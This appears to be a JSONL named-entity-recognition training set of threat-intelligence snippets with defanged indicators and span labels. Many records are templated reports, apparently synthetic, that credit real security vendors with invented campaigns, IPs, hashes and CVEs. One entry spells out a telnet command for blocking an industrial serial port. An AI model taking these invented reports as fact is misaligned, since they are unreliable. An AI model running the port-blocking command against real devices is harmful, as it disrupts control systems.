{"text": "Kaspersky GReAT published a threat intelligence report linking Diamond Sleet to a new campaign exploiting CVE-2026-27261 in Apache Struts. The attackers deployed Conti via Ligolo, establishing C2 communication with 192[.]191[.]228[.]125 and auth-secure[ . ]link. A secondary payload was downloaded from hxxp://api-cloud[ . ]top/admin/config. The malware binary (MD5: d1750cfa51b2004ae0753113c69f13f3) was dropped to C:\\Users\\Public\\Documents\\runtime.dll. Phishing emails were sent from confirm@identity-verify[ . ]cc targeting enterprise users. A backup C2 server was identified at 172[.]98[.]164[.]132.", "spans": {"Organization: Kaspersky GReAT": [[0, 15]], "Vulnerability: CVE-2026-27261": [[106, 120]], "System: Apache Struts": [[124, 137]], "Malware: Conti": [[162, 167]], "Indicator: 192.191.228.125": [[215, 236]], "Indicator: auth-secure.link": [[241, 261]], "Indicator: hxxp://api-cloud.top/admin/config": [[303, 340]], "Indicator: d1750cfa51b2004ae0753113c69f13f3": [[367, 399]], "Indicator: confirm@identity-verify.cc": [[486, 516]], "Indicator: 172.98.164.132": [[582, 602]]}, "info": {"id": "synth_v2_00148", "source": "defanged_augment"}}
{"text": "CVE-2026-35072: Dell PowerProtect Data Domain, versions 7[.]7[.]1[.]0 through 8 [ . ] 7 [ . ] 0 [ . ] 0, LTS2025 release versions 8 [ . ] 3 [ . ] 1 [ . ] 0 through 8 [ . ] 3 [ . ] 1 [ . ] 20, LTS2024 release versions 7[.]13[.]1[.]0 through 7[.]13[.]1[.]60 contain an improper neutralization of special elements used in an OS command ('OS command injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution with root privileges.", "spans": {"Vulnerability: CVE-2026-35072": [[0, 14]], "Vulnerability: improper neutralization": [[267, 290]], "Vulnerability: command injection": [[338, 355]], "Vulnerability: arbitrary command": [[475, 492]], "Indicator: 7.7.1.0": [[56, 69]], "Indicator: 8.7.0.0": [[78, 103]], "Indicator: 8.3.1.0": [[130, 155]], "Indicator: 8.3.1.20": [[164, 190]], "Indicator: 7.13.1.0": [[217, 231]], "Indicator: 7.13.1.60": [[240, 255]]}, "info": {"id": "nvd_2026_35072", "source": "defanged_augment"}}
{"text": "Blog Post by Check Point Research: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24328 against Citrix NetScaler deployments. The initial access vector involves spear-phishing emails from alert@auth-check[ . ]org delivering Play. Post-compromise, the attackers deploy PikaBot and use Hashcat for reconnaissance. C2 infrastructure includes 126 [ . ] 246 [ . ] 84 [ . ] 247 and nodeproxy[.]club. A staging server at hxxps://datarelay[ . ]net/callback hosts additional tooling. Key artifact: /var/tmp/runtime.dll (MD5: c8378e7f469fc81b131edebeb8a63602).", "spans": {"Organization: Check Point Research": [[13, 33]], "Vulnerability: CVE-2020-24328": [[137, 151]], "System: Citrix NetScaler": [[160, 176]], "Indicator: alert@auth-check.org": [[252, 276]], "Malware: Play": [[288, 292]], "Malware: PikaBot": [[332, 339]], "Indicator: 126.246.84.247": [[403, 435]], "Indicator: nodeproxy.club": [[440, 456]], "Indicator: https://datarelay.net/callback": [[478, 512]], "Indicator: c8378e7f469fc81b131edebeb8a63602": [[580, 612]]}, "info": {"id": "synth_v2_01602", "source": "defanged_augment"}}
{"text": "Distribution via alternative app stores . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The launcher is a 32-bit DLL named hpqhvsei[ . ]dll , which is the name of a legitimate DLL loaded by hpqhvind[.]exe . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": {"Vulnerability: Microsoft Office vulnerability": [[90, 120]], "Vulnerability: CVE-2017-11882": [[123, 137]], "Indicator: hpqhvsei.dll": [[177, 193]], "Indicator: hpqhvind.exe": [[244, 258]], "Organization: gaming , pharmaceutical , and telecommunications companies": [[537, 595]]}, "info": {"id": "cyberner_stix_train_007054", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetlink: avoid infinite retry looping in netlink_unicast()\n\nnetlink_attachskb() checks for the socket's read memory allocation\nconstraints. Firstly, it has:\n\n  rmem < READ_ONCE(sk->sk_rcvbuf)\n\nto check if the just increased rmem value fits into the socket's receive\nbuffer. If not, it proceeds and tries to wait for the memory under:\n\n  rmem + skb->truesize > READ_ONCE(sk->sk_rcvbuf)\n\nThe checks don't cover the case when skb->truesize + sk->sk_rmem_alloc is\nequal to sk->sk_rcvbuf. Thus the function neither successfully accepts\nthese conditions, nor manages to reschedule the task - and is called in\nretry loop for indefinite time which is caught as:\n\n  rcu: INFO: rcu_sched self-detected stall on CPU\n  rcu:     0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212\n  (t=26000 jiffies g=230833 q=259957)\n  NMI backtrace for cpu 0\n  CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68\n  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014\n  Call Trace:\n  <IRQ>\n  dump_stack lib/dump_stack.c:120\n  nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105\n  nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62\n  rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335\n  rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590\n  update_process_times kernel/time/timer.c:1953\n  tick_sched_handle kernel/time/tick-sched.c:227\n  tick_sched_timer kernel/time/tick-sched.c:1399\n  __hrtimer_run_queues kernel/time/hrtimer.c:1652\n  hrtimer_interrupt kernel/time/hrtimer.c:1717\n  __sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113\n  asm_call_irq_on_stack arch/x86/entry/entry_64.S:808\n  </IRQ>\n\n  netlink_attachskb net/netlink/af_netlink.c:1234\n  netlink_unicast net/netlink/af_netlink.c:1349\n  kauditd_send_queue kernel/audit.c:776\n  kauditd_thread kernel/audit.c:897\n  kthread kernel/kthread.c:328\n  ret_from_fork arch/x86/entry/entry_64.S:304\n\nRestore the original behavior of the check which commit in Fixes\naccidentally missed when restructuring the code.\n\nFound by Linux Verification Center (linuxtesting[.]org).", "spans": {"Indicator: linuxtesting.org": [[2118, 2136]], "System: Linux kernel": [[7, 19]], "System: Linux": [[2091, 2096]], "System: QEMU": [[1013, 1017]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-38727"}}
{"text": "A backdoor also known as: HW32.Packed.BCC5 W32.Virut.G Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Foreign-502 Trojan.DownLoader11.60294 BehavesLike[ . ]Win32[ . ]Sality[ . ]cc Win32.Virut.eb.368640 Trojan/Win32.Foreign.R131573 Trojan-Ransom.Win32.Foreign", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Sality.cc": [[147, 186]]}, "info": {"id": "cyner2_train_006677", "source": "defanged_augment"}}
{"text": "Link embedded in the PDF document : hxxps://csaasd[ . ]egnyte[ . ]com/dd/h5s7YHzOy5 .", "spans": {"Indicator: https://csaasd.egnyte.com/dd/h5s7YHzOy5": [[36, 83]]}, "info": {"id": "cyberner_stix_train_007346", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Backdoor/W32.SdBot.25088.Q Backdoor/Afbot.a BKDR_POEBOT.DK Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_POEBOT.DK Backdoor.Win32.Afbot.a Trojan.Win32.Afbot.daze Backdoor.Win32.S.Afbot.25088 Backdoor.W32.Afbot.a!c Backdoor.Win32.Afbot.~A BackDoor.IRC.Afbot Backdoor.Afbot.Win32.1 Backdoor/Afbot.a Trojan[Backdoor]/Win32.Afbot Backdoor:Win32/Afbot.A Backdoor.Win32.Afbot.a Backdoor.Afbot Bck/Iroffer[.]BG Win32.Backdoor.Afbot.Szbp Backdoor.Afbot!ktevPrMqQWw W32/Afbot.A!tr.bdr Win32/Backdoor.BO.3c4", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Iroffer.BG": [[435, 447]]}, "info": {"id": "cyner2_train_003084", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njffs2: check that raw node were preallocated before writing summary\n\nSyzkaller detected a kernel bug in jffs2_link_node_ref, caused by fault\ninjection in jffs2_prealloc_raw_node_refs. jffs2_sum_write_sumnode doesn't\ncheck return value of jffs2_prealloc_raw_node_refs and simply lets any\nerror propagate into jffs2_sum_write_data, which eventually calls\njffs2_link_node_ref in order to link the summary to an expectedly allocated\nnode.\n\nkernel BUG at fs/jffs2/nodelist.c:592!\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nCPU: 1 PID: 31277 Comm: syz-executor.7 Not tainted 6.1.128-syzkaller-00139-ge10f83ca10a1 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:jffs2_link_node_ref+0x570/0x690 fs/jffs2/nodelist.c:592\nCall Trace:\n <TASK>\n jffs2_sum_write_data fs/jffs2/summary.c:841 [inline]\n jffs2_sum_write_sumnode+0xd1a/0x1da0 fs/jffs2/summary.c:874\n jffs2_do_reserve_space+0xa18/0xd60 fs/jffs2/nodemgmt.c:388\n jffs2_reserve_space+0x55f/0xaa0 fs/jffs2/nodemgmt.c:197\n jffs2_write_inode_range+0x246/0xb50 fs/jffs2/write.c:362\n jffs2_write_end+0x726/0x15d0 fs/jffs2/file.c:301\n generic_perform_write+0x314/0x5d0 mm/filemap.c:3856\n __generic_file_write_iter+0x2ae/0x4d0 mm/filemap.c:3973\n generic_file_write_iter+0xe3/0x350 mm/filemap.c:4005\n call_write_iter include/linux/fs.h:2265 [inline]\n do_iter_readv_writev+0x20f/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10c/0x170 fs/splice.c:950\n splice_direct_to_actor+0x337/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFix this issue by checking return value of jffs2_prealloc_raw_node_refs\nbefore calling jffs2_sum_write_data.\n\nFound by Linux Verification Center (linuxtesting[.]org) with Syzkaller.", "spans": {"Indicator: linuxtesting.org": [[2291, 2309]], "System: Linux kernel": [[7, 19]], "System: Linux": [[2264, 2269]], "System: QEMU": [[701, 705]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-38194"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 2[.]86[.]251[.]1, the Tenable IR team identified Royal running as /dev/shm/config.dat. The threat actor, believed to be Diamond Sleet, used LinPEAS for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to gatewaysecure[.]org and securelogin[.]xyz. The initial dropper (SHA1: b70269e5f3d8f2fe3eaf7ab72d7ad2600d07ecad) was delivered via a phishing email from billing@account-update[ . ]xyz. A second C2 node was observed at 10[.]213[.]213[.]168, with a persistence mechanism writing to C:\\Users\\Public\\Documents\\sam.hive.", "spans": {"Indicator: 2.86.251.1": [[64, 80]], "Organization: Tenable": [[86, 93]], "Malware: Royal": [[113, 118]], "Indicator: gatewaysecure.org": [[300, 319]], "Indicator: securelogin.xyz": [[324, 341]], "Indicator: b70269e5f3d8f2fe3eaf7ab72d7ad2600d07ecad": [[370, 410]], "Indicator: billing@account-update.xyz": [[452, 482]], "Indicator: 10.213.213.168": [[517, 537]]}, "info": {"id": "synth_v2_00326", "source": "defanged_augment"}}
{"text": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. \n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10[.]0[.]0[.]1 via Telnet on serial port 1 with the following command: telnet 10 [ . ] 0 [ . ] 0 [ . ] 1 20001.", "spans": {"System: COM": [[39, 42], [143, 146], [269, 272], [298, 301], [365, 368], [495, 498], [598, 601], [825, 828]], "Indicator: 10.0.0.1": [[1191, 1205], [1269, 1295]]}, "info": {"source": "defanged_augment", "mitre_id": "T0805"}}
{"text": "The best bet for Readers who want to make sure their phone is n't infected is to scan their phones using the free version of the Lookout Security and Antivirus app . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group . APT33 : 91[.]230[.]121[.]143 remote-server[ . ]ddns[ . ]net . The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": {"Organization: Lookout": [[129, 136]], "Organization: Microsoft": [[176, 185]], "Organization: Facebook": [[210, 218]], "Organization: security community": [[237, 255]], "Indicator: 91.230.121.143": [[442, 462]], "Indicator: remote-server.ddns.net": [[463, 493]]}, "info": {"id": "cyberner_stix_train_000146", "source": "defanged_augment"}}
{"text": "We hope that this blog post helps other researchers to understand and analyze FinFisher samples and that this industry-wide information-sharing translate to the protection of as many customers as possible . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea . Based on ESET telemetry , one of the second stage payload delivered to victims is Win64/Winnti[.]BN . Its capabilities include retrieving and executing additional payloads , collecting basic system information , and executing shell commands .", "spans": {"Malware: FinFisher": [[78, 87]], "Organization: ESET": [[399, 403]], "Indicator: Win64/Winnti.BN": [[472, 489]]}, "info": {"id": "cyberner_stix_train_006564", "source": "defanged_augment"}}
{"text": "Blog Post by FBI: Tracking Mustang Panda's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-17185 against Progress Telerik deployments. The initial access vector involves spear-phishing emails from notification@identity-verify[.]cc delivering TrickBot. Post-compromise, the attackers deploy PlugX and use Hashcat for reconnaissance. C2 infrastructure includes 192[.]49[.]158[.]221 and syncstatic[.]info. A staging server at hxxps://cache-cache[ . ]site/secure/token hosts additional tooling. Key artifact: C:\\Users\\admin\\Downloads\\backdoor.elf (SHA1: b8dff9a2b96073d6395542613017755c30e37bc6).", "spans": {"Organization: FBI": [[13, 16]], "Vulnerability: CVE-2025-17185": [[120, 134]], "System: Progress Telerik": [[143, 159]], "Indicator: notification@identity-verify.cc": [[235, 268]], "Malware: TrickBot": [[280, 288]], "Malware: PlugX": [[328, 333]], "Indicator: 192.49.158.221": [[397, 417]], "Indicator: syncstatic.info": [[422, 439]], "Indicator: https://cache-cache.site/secure/token": [[461, 502]], "Indicator: b8dff9a2b96073d6395542613017755c30e37bc6": [[588, 628]]}, "info": {"id": "synth_v2_01686", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle Commerce Guided Search / Oracle Commerce Experience Manager product of Oracle Commerce (component: Tools and Frameworks). The supported version that is affected is 11[.]3[.]1[.]5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Commerce Guided Search / Oracle Commerce Experience Manager. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Commerce Guided Search / Oracle Commerce Experience Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Commerce Guided Search / Oracle Commerce Experience Manager accessible data as well as unauthorized read access to a subset of Oracle Commerce Guided Search / Oracle Commerce Experience Manager accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 11.3.1.5": [[192, 206]], "Organization: Oracle": [[21, 27], [53, 59], [99, 105], [315, 321], [347, 353], [500, 506], [532, 538], [733, 739], [765, 771], [867, 873], [899, 905]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-2345"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at /tmp/loader.exe. Memory dump analysis confirmed execution of Metasploit. Registry modifications pointed to persistence via C:\\Users\\admin\\AppData\\Local\\Temp\\lsass.dmp. Network forensics identified connections to 172 [ . ] 39 [ . ] 218 [ . ] 254 and datacloud[ . ]site. Email headers traced the initial vector to helpdesk@secure-verify[.]net. File C:\\Users\\admin\\Downloads\\update.dll (SHA256: ea5b38c145be6e88f5a14b1569e80f6a597f2f297279b70ab2f0b64eb6aa37c6) was identified as the initial dropper. A staging URL hxxps://staticnode[ . ]tech/collect resolved to 90 [ . ] 96 [ . ] 87 [ . ] 30. Secondary artifact hash: SHA256: 1b813fe60298c2d99f225b8fbb2e8a5841b1376ee5daf888c0bb4384ab98a869.", "spans": {"Indicator: 172.39.218.254": [[304, 336]], "Indicator: datacloud.site": [[341, 359]], "Indicator: helpdesk@secure-verify.net": [[404, 432]], "Indicator: ea5b38c145be6e88f5a14b1569e80f6a597f2f297279b70ab2f0b64eb6aa37c6": [[484, 548]], "Indicator: https://staticnode.tech/collect": [[603, 638]], "Indicator: 90.96.87.30": [[651, 680]], "Indicator: 1b813fe60298c2d99f225b8fbb2e8a5841b1376ee5daf888c0bb4384ab98a869": [[715, 779]]}, "info": {"id": "synth_v2_01129", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 3 [ . ] 143 [ . ] 75 [ . ] 180, the Trend Micro IR team identified AsyncRAT running as /opt/app/bin/lsass.dmp. The threat actor, believed to be Aqua Blizzard, used LinPEAS for credential harvesting and Hashcat for lateral movement. Exfiltrated data was sent to portalcloud[.]dev and apicdn[.]io. The initial dropper (SHA1: aa931c09f3fd6ee6c496481eb7a977abeffbeb4e) was delivered via a phishing email from billing@secure-verify[ . ]net. A second C2 node was observed at 115 [ . ] 105 [ . ] 226 [ . ] 179, with a persistence mechanism writing to C:\\Windows\\System32\\loader.exe.", "spans": {"Indicator: 3.143.75.180": [[64, 94]], "Organization: Trend Micro": [[100, 111]], "Malware: AsyncRAT": [[131, 139]], "Indicator: portalcloud.dev": [[325, 342]], "Indicator: apicdn.io": [[347, 358]], "Indicator: aa931c09f3fd6ee6c496481eb7a977abeffbeb4e": [[387, 427]], "Indicator: billing@secure-verify.net": [[469, 498]], "Indicator: 115.105.226.179": [[533, 566]]}, "info": {"id": "synth_v2_00281", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-26162 is a critical XXE injection affecting F5 BIG-IP. Kaspersky GReAT confirmed active exploitation by Salt Typhoon in the wild. Exploitation delivers Gootloader (SHA1: 93deeabea0344f7cf74ff9aaf76788eedf317ad2) which is dropped to /home/user/.config/shell.php. The exploit payload is hosted at hxxp://logincloud[.]top/collect and communicates to 192 [ . ] 123 [ . ] 245 [ . ] 129 for C2.", "spans": {"Vulnerability: CVE-2024-26162": [[24, 38]], "Vulnerability: XXE injection": [[53, 66]], "System: F5 BIG-IP": [[77, 86]], "Organization: Kaspersky GReAT": [[88, 103]], "Malware: Gootloader": [[185, 195]], "Indicator: 93deeabea0344f7cf74ff9aaf76788eedf317ad2": [[203, 243]], "Indicator: hxxp://logincloud.top/collect": [[328, 359]], "Indicator: 192.123.245.129": [[380, 413]]}, "info": {"id": "synth_v2_00798", "source": "defanged_augment"}}
{"text": "One example of the new Sofacy USBSTEALER modules is 8b238931a7f64fddcad3057a96855f6c , which is named internally as msdetltemp[ . ]dll .", "spans": {"Indicator: 8b238931a7f64fddcad3057a96855f6c": [[52, 84]], "Indicator: msdetltemp.dll": [[116, 134]]}, "info": {"id": "cyberner_stix_train_003739", "source": "defanged_augment"}}
{"text": "APT29, also known as Cozy Bear and tracked by Microsoft as Midnight Blizzard, conducted a phishing campaign targeting European diplomatic entities in Q1 2025. The group distributed malicious ISO files containing a shortcut file that executed a DLL payload via rundll32.exe. The DLL with SHA256 hash f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2 was loaded from C:\\Users\\Public\\Documents\\config.dll. C2 communications were directed to auth-microsoft365[ . ]com and login-sharepoint[ . ]org over HTTPS port 443. The phishing emails were sent from compromised accounts at legitimate organizations and contained links to hxxps://auth-microsoft365[ . ]com/oauth/v2/authorize?client_id=payload. Secondary C2 infrastructure was hosted at 194 [ . ] 58 [ . ] 112 [ . ] 43 and 89[.]34[.]27[.]199. The group also deployed Brute Ratel C4 from C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe.", "spans": {"Organization: Microsoft": [[46, 55]], "Indicator: f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[299, 363]], "Indicator: auth-microsoft365.com": [[453, 478]], "Indicator: login-sharepoint.org": [[483, 507]], "Indicator: hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload": [[636, 706]], "Indicator: 194.58.112.43": [[750, 781]], "Indicator: 89.34.27.199": [[786, 804]], "Malware: Brute Ratel C4": [[830, 844]]}, "info": {"id": "malware_00016", "source": "defanged_augment"}}
{"text": "Artifact Analysis for RedLine Stealer campaign:\nStage 1 dropper at /tmp/taskhost.exe - SHA256: 666b9995b6355c0b8727da604c0bf6fb505fe2e4fb0e6a5ff2b8c9e77eb48ebd\nStage 2 loader at C:\\Users\\admin\\Downloads\\csrss.exe - MD5: 09d8685246bf38b0ecadfff7aa9c1085\nFinal payload at C:\\Users\\admin\\Downloads\\agent.py - MD5: 478844240b8d53ad45ef53af836e004c\nExfiltration module - SHA1: 7cb6d96d5cd6621b9c2ae28c02684b0ed9f96c0c\nAll stages communicated with 207[.]16[.]62[.]57. LaZagne signatures detected in Stage 2.", "spans": {"Malware: RedLine Stealer": [[22, 37]], "Indicator: 666b9995b6355c0b8727da604c0bf6fb505fe2e4fb0e6a5ff2b8c9e77eb48ebd": [[95, 159]], "Indicator: 09d8685246bf38b0ecadfff7aa9c1085": [[220, 252]], "Indicator: 478844240b8d53ad45ef53af836e004c": [[311, 343]], "Indicator: 7cb6d96d5cd6621b9c2ae28c02684b0ed9f96c0c": [[372, 412]], "Indicator: 207.16.62.57": [[442, 460]]}, "info": {"id": "synth_v2_01995", "source": "defanged_augment"}}
{"text": "About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim ’ s online banking account and perform money transfers . PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation[.]dot .", "spans": {"Malware: ThreeDollars": [[366, 378]], "Indicator: preparation.dot": [[438, 455]]}, "info": {"id": "cyberner_stix_train_008021", "source": "defanged_augment"}}
{"text": "Blog Post by Volexity: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-10212 against Windows 11 deployments. The initial access vector involves spear-phishing emails from support@mail-service[ . ]info delivering Qbot. Post-compromise, the attackers deploy TrickBot and use LaZagne for reconnaissance. C2 infrastructure includes 218[.]22[.]33[.]85 and data-relay[ . ]top. A staging server at hxxps://securegateway[ . ]io/collect hosts additional tooling. Key artifact: C:\\Windows\\System32\\backdoor.elf (MD5: 61cf8b20b132216a0308d730d389c1f1).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2026-10212": [[124, 138]], "System: Windows 11": [[147, 157]], "Indicator: support@mail-service.info": [[233, 262]], "Malware: Qbot": [[274, 278]], "Malware: TrickBot": [[318, 326]], "Indicator: 218.22.33.85": [[390, 408]], "Indicator: data-relay.top": [[413, 431]], "Indicator: https://securegateway.io/collect": [[453, 489]], "Indicator: 61cf8b20b132216a0308d730d389c1f1": [[569, 601]]}, "info": {"id": "synth_v2_01638", "source": "defanged_augment"}}
{"text": "IOC Bulletin - RemcosRAT Campaign:\nNetwork Indicators:\n- 192[.]174[.]35[.]182\n- 192[.]246[.]192[.]181\n- 172 [ . ] 82 [ . ] 145 [ . ] 107\n- backup-login[.]club\n- secureupdate[.]info\nURLs:\n- hxxp://loginupdate[ . ]site/wp-content/uploads/doc.php\n- hxxp://gatewayapi[ . ]net/panel/index.html\nEmail Senders:\n- verify@login-portal[.]tech\n- updates@account-update[ . ]xyz\nFile Indicators:\n- SHA256: 358c3b3fdb9b39b987052c0916bce1e09d32012ba9cca92ad694a80bd24f87e2\n- SHA1: 8d1e8918e2c323b9814ea59555065674e74267e0\n- Drop path: C:\\Users\\admin\\Downloads\\lsass.dmp", "spans": {"Malware: RemcosRAT": [[15, 24]], "Indicator: 192.174.35.182": [[57, 77]], "Indicator: 192.246.192.181": [[80, 101]], "Indicator: 172.82.145.107": [[104, 136]], "Indicator: backup-login.club": [[139, 158]], "Indicator: secureupdate.info": [[161, 180]], "Indicator: hxxp://loginupdate.site/wp-content/uploads/doc.php": [[189, 243]], "Indicator: http://gatewayapi.net/panel/index.html": [[246, 288]], "Indicator: verify@login-portal.tech": [[306, 332]], "Indicator: updates@account-update.xyz": [[335, 365]], "Indicator: 358c3b3fdb9b39b987052c0916bce1e09d32012ba9cca92ad694a80bd24f87e2": [[393, 457]], "Indicator: 8d1e8918e2c323b9814ea59555065674e74267e0": [[466, 506]]}, "info": {"id": "synth_v2_01455", "source": "defanged_augment"}}
{"text": "Scattered Spider has compromised cloud environments by exploiting CVE-2023-22515 in Atlassian Confluence and using social engineering to defeat Okta multi-factor authentication. The threat actor deploys the ALPHV/BlackCat ransomware after establishing persistence. Mandiant observed the group using Fleetdeck[.]io and AnyDesk for remote access. CISA recommends reviewing Okta system logs and Azure Active Directory sign-in logs for anomalous activity.", "spans": {"Vulnerability: CVE-2023-22515": [[66, 80]], "System: Atlassian Confluence": [[84, 104]], "System: Okta": [[144, 148], [371, 375]], "Malware: BlackCat": [[213, 221]], "Organization: Mandiant": [[265, 273]], "Organization: CISA": [[345, 349]], "System: Azure Active Directory": [[392, 414]], "Indicator: Fleetdeck.io": [[299, 313]]}, "info": {"id": "cisa_00024", "source": "defanged_augment"}}
{"text": "Huntress detected a multi-stage attack chain. The initial phishing email from ceo@account-update[.]xyz contained a link to hxxp://node-proxy[ . ]org/portal/verify. This redirected to hxxps://cdn-mail[ . ]cc/secure/token on mailsecure[.]cc. A secondary email from noreply@secure-verify[ . ]net pointed to hxxps://cachenode[.]club/secure/token which delivered SmokeLoader. The final payload callback was hxxps://storageapi[ . ]io/collect resolving to 51 [ . ] 65 [ . ] 156 [ . ] 37 via syncdata[.]top.", "spans": {"Organization: Huntress": [[0, 8]], "Indicator: ceo@account-update.xyz": [[78, 102]], "Indicator: http://node-proxy.org/portal/verify": [[123, 162]], "Indicator: hxxps://cdn-mail.cc/secure/token": [[183, 219]], "Indicator: mailsecure.cc": [[223, 238]], "Indicator: noreply@secure-verify.net": [[263, 292]], "Indicator: hxxps://cachenode.club/secure/token": [[304, 341]], "Malware: SmokeLoader": [[358, 369]], "Indicator: https://storageapi.io/collect": [[402, 435]], "Indicator: 51.65.156.37": [[449, 479]], "Indicator: syncdata.top": [[484, 498]]}, "info": {"id": "synth_v2_01828", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Play (SHA256: 85763adb54f4ac53b92d3da8ae72ff630a2b80b25b11896e68daf48e16f3c351). Upon execution on Ivanti Connect Secure, the sample creates C:\\Users\\admin\\Downloads\\chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 154 [ . ] 211 [ . ] 146 [ . ] 56 every 60 seconds and DNS queries to syncmail[.]club. The second stage was fetched from hxxps://node-update[ . ]top/portal/verify and written to C:\\Users\\admin\\AppData\\Local\\Temp\\chrome_helper.exe. The payload uses PowerShell Empire-style techniques for defense evasion. A secondary hash (MD5: 2c97181e571b3ddb46e6082847ef63f3) was extracted from the unpacked payload.", "spans": {"Malware: Play": [[25, 29]], "Indicator: 85763adb54f4ac53b92d3da8ae72ff630a2b80b25b11896e68daf48e16f3c351": [[39, 103]], "System: Ivanti Connect Secure": [[124, 145]], "Indicator: 154.211.146.56": [[284, 316]], "Indicator: syncmail.club": [[353, 368]], "Indicator: https://node-update.top/portal/verify": [[404, 445]], "Indicator: 2c97181e571b3ddb46e6082847ef63f3": [[610, 642]]}, "info": {"id": "synth_v2_00549", "source": "defanged_augment"}}
